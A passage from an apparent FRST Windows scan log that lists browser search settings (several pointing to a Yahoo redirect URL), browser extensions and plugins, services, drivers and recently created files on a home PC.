SearchScopes: HKLM-x32 -> {29DAFA99-4299-408B-A085-18B288E65C09} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1001 -> {29DAFA99-4299-408B-A085-18B288E65C09} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEyBtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyB0FtCtD0CtA0B0CtGyBzzyD0CtG0EyDtBzytGtAzzzyyBtG0EyDtByDyEyCyE0FtCtC0B0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1057114629%26a%3Dwncy_omxmedia_15_51_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEyBtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyB0FtCtD0CtA0B0CtGyBzzyD0CtG0EyDtBzytGtAzzzyyBtG0EyDtByDyEyCyE0FtCtC0B0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1057114629%26a%3Dwncy_omxmedia_15_51_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {6B023522-B37A-4323-9007-FF11E4F94C80} URL = hxxp://www.bing.com/search?FORM=WLETDF&PC=WLEM&q={searchTerms}&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEzztN1L2XzutAtFtCyEtFtDtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyE0EzytAyEzzzz0AtGyD0A0CyEtGyByEyCtCtGyEyB0DyDtGzy0Ezz0DyByDyCtCzytB0Czz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1118004757%26a%3Dwny_omxmedia_15_51_ssg03%26os%3DWindows%2B10%2BHome&p={searchTerms}
BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2015\pmbxie.dll [2015-12-18] (Bitdefender)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-12-15] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_71\bin\ssv.dll [2016-01-21] (Oracle Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-21] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_71\bin\jp2ssv.dll [2016-01-21] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2015\Antispam32\pmbxie.dll [2015-12-18] (Bitdefender)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-12-17] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2015\pmbxie.dll [2015-12-18] (Bitdefender)
Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2015\Antispam32\pmbxie.dll [2015-12-18] (Bitdefender)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-08-22] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.71.2 -> C:\Program Files\Java\jre1.8.0_71\bin\dtplugin\npDeployJava1.dll [2016-01-21] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.71.2 -> C:\Program Files\Java\jre1.8.0_71\bin\plugin2\npjp2.dll [2016-01-21] (Oracle Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32.dll [2016-01-31] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-08-18] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-05] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-05] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2014-11-14] ()
FF Plugin HKU\S-1-5-21-1436452318-2580999886-2786755032-1003: @citrixonline.com/appdetectorplugin -> C:\Users\sesay\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-01-27] (Citrix Online)
FF HKLM\...\Firefox\Extensions: [bdwteffv19@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff
FF Extension: Bitdefender Wallet - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff [2015-12-20]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext
FF Extension: Bitdefender Antispam Toolbar - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext [2015-08-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [firefox@bho.com] - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt
FF Extension: HP SimplePass - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt [2015-03-25] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv19@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext
 
Chrome: 
=======
CHR HomePage: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
CHR StartupUrls: Default -> "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome"
CHR DefaultSearchURL: Default -> hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
CHR DefaultSearchKeyword: Default -> Search Provided by Yahoo.com
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms}
CHR Profile: C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-10]
CHR Extension: (Google Docs) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-10]
CHR Extension: (Google Drive) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-10]
CHR Extension: (YouTube) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-10]
CHR Extension: (Google Search) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-10]
CHR Extension: (Bitdefender Wallet) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\fabcmochhfpldjekobfaaggijgohadih [2015-11-10]
CHR Extension: (Google Sheets) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-10]
CHR Extension: (Google Docs Offline) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-10]
CHR Extension: (Chrome Web Store Payments) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-10]
CHR Extension: (Gmail) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-10]
CHR HKLM-x32\...\Chrome\Extension: [fabcmochhfpldjekobfaaggijgohadih] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2286848 2015-10-17] (Broadcom Corporation.)
S3 BdDesktopParental; C:\Program Files\Bitdefender\Bitdefender 2015\bdparentalservice.exe [78144 2015-11-11] (Bitdefender)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2787512 2015-12-22] (Microsoft Corporation)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [347200 2015-01-15] (WildTangent)
U2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2015-12-30] (Hi-Rez Studios) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [373720 2016-01-19] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [158496 2014-10-10] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [103424 2015-01-30] (Softex Inc.) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [316152 2016-01-15] (Realtek Semiconductor)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2015\updatesrv.exe [100816 2015-11-11] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2015\vsserv.exe [1561344 2015-12-18] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [1600512 2015-11-11] (BitDefender)
R3 avchv; C:\Windows\system32\DRIVERS\avchv.sys [282000 2015-12-07] (BitDefender)
R3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [775424 2015-11-11] (BitDefender)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [208176 2015-10-17] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7533784 2015-02-14] (Broadcom Corporation)
R1 BdfNdisf; C:\Windows\System32\DriverStore\FileRepository\netlwf.inf_amd64_47566fa3371097e5\bdfndisf6.sys [98768 2014-12-15] (BitDefender LLC)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [115800 2015-12-18] (BitDefender LLC)
S3 bdfwfpf_pc; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf_pc.sys [130656 2015-12-18] (Bitdefender SRL)
R1 BDVEDISK; C:\Windows\system32\DRIVERS\bdvedisk.sys [87912 2015-12-18] (BitDefender)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
R3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
R3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
R0 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [160032 2015-10-01] (BitDefender LLC)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [129312 2014-10-10] (Intel Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [477272 2015-10-01] (BitDefender S.R.L.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-31 19:56 - 2016-01-31 19:57 - 00034498 _____ C:\Users\sesay\Desktop\FRST.txt
2016-01-31 19:54 - 2016-01-31 19:54 - 02370560 _____ (Farbar) C:\Users\sesay\Desktop\FRST64.exe
2016-01-31 19:44 - 2016-01-31 19:44 - 00000000 ____D C:\Users\sesay\Documents\My Games
2016-01-31 19:19 - 2016-01-31 19:19 - 00002113 _____ C:\Users\Public\Desktop\Hi-Rez Diagnostics and Support.lnk
2016-01-31 19:19 - 2016-01-31 19:19 - 00002106 _____ C:\Users\Public\Desktop\Paladins.lnk
2016-01-31 19:19 - 2016-01-31 19:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hi-Rez Studios
2016-01-31 19:19 - 2016-01-31 19:19 - 00000000 ____D C:\ProgramData\Hi-Rez Studios
2016-01-31 19:19 - 2016-01-31 19:19 - 00000000 ____D C:\Program Files (x86)\Hi-Rez Studios
2016-01-31 19:18 - 2016-01-31 19:18 - 51404448 _____ (Hi-Rez Studios) C:\Users\sesay\Downloads\InstallPaladins.exe
2016-01-31 19:14 - 2016-01-31 19:16 - 232848723 _____ C:\Users\sesay\Downloads\Ninety9Lives 97 Level Up.zip
2016-01-31 19:11 - 2016-01-31 19:11 - 00000000 ___HD C:\OneDriveTemp
2016-01-31 16:41 - 2016-01-31 16:41 - 00000000 ____D C:\Users\abang\AppData\Local\NetworkTiles
2016-01-30 20:49 - 2016-01-30 20:50 - 00000000 ____D C:\WINDOWS\LastGood
2016-01-28 22:01 - 2016-01-28 22:02 - 00000000 ____D C:\tmp
2016-01-27 19:48 - 2016-01-27 19:48 - 00034027 _____ C:\Users\sesay\Desktop\internet.txt
2016-01-27 18:24 - 2016-01-27 19:49 - 00060528 _____ C:\Users\sesay\Desktop\New Text Document.txt
2016-01-27 17:51 - 2016-01-31 19:56 - 00000000 ____D C:\FRST
2016-01-27 15:17 - 2016-01-16 01:23 - 08728920 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-01-27 15:17 - 2016-01-16 01:20 - 06971752 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-01-27 15:17 - 2016-01-16 01:20 - 06600904 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-01-27 15:17 - 2016-01-16 01:17 - 21125400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-01-27 15:17 - 2016-01-16 01:16 - 05238360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-01-27 15:17 - 2016-01-16 01:13 - 01998168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-01-27 15:17 - 2016-01-16 01:13 - 00576864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-01-27 15:17 - 2016-01-16 01:09 - 01089880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-01-27 15:17 - 2016-01-16 00:45 - 16986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-01-27 15:17 - 2016-01-16 00:44 - 22394368 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-01-27 15:17 - 2016-01-16 00:43 - 00097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttpcom.dll
2016-01-27 15:17 - 2016-01-16 00:42 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscoreext.dll
2016-01-27 15:17 - 2016-01-16 00:40 - 11545088 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-01-27 15:17 - 2016-01-16 00:38 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-01-27 15:17 - 2016-01-16 00:35 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-01-27 15:17 - 2016-01-16 00:34 - 00610816 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2016-01-27 15:17 - 2016-01-16 00:34 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttpcom.dll
